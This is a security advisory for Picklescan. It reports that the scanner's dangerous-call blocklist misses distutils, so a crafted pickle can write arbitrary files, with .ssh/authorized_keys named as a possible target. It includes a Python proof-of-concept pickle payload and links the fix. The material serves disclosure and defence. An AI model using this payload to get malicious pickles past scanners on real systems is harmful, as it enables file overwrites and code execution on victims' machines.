GHSA-m273-6v24-x4m4
Picklescan vulnerable to Arbitrary File Writing
상세
### Summary Picklescan has got open() and shutil in its default dangerous blocklist to prevent arbitrary file overwrites. However the module distutils isnt blocked and can be used for the same purpose ie to write arbitrary files.
### Details This is another vulnerability which impacts the downstream user.
By constructing a pickle that user distutils.file_util.write_file, an attacker can overwrite critical system files (like .ssh/authorized_keys, web server configurations, or source code) to achieve DoS or escalate to RCE.
### PoC ```python import pickle import distutils.file_util
class FileWriteBypass: def __reduce__(self): target_file = "pwned_config.env" content = ["print('I have overwritten your config')"] return (distutils.file_util.write_file, (target_file, content))
payload = pickle.dumps(FileWriteBypass()) with open("bypass_filewrite.pkl", "wb") as f: f.write(payload)
print("bypass_filewrite.pkl") ```
<img width="853" height="197" alt="image" src="https://github.com/user-attachments/assets/a129f5aa-a050-4e88-adb7-5a6f93e35b65" />
To fix this just add disutil to the blacklist
이 버전이 영향받나요?
사용 중인 패키지 버전을 입력하면 즉시 평가합니다.
영향 패키지
참고
- https://github.com/mmaitre314/picklescan/security/advisories/GHSA-m273-6v24-x4m4 [WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2025-71321 [ADVISORY]
- https://github.com/mmaitre314/picklescan/pull/53 [WEB]
- https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab [WEB]
- https://github.com/mmaitre314/picklescan [PACKAGE]
- https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33 [WEB]
- https://www.vulncheck.com/advisories/picklescan-arbitrary-file-writing-via-distutils-module-bypass [WEB]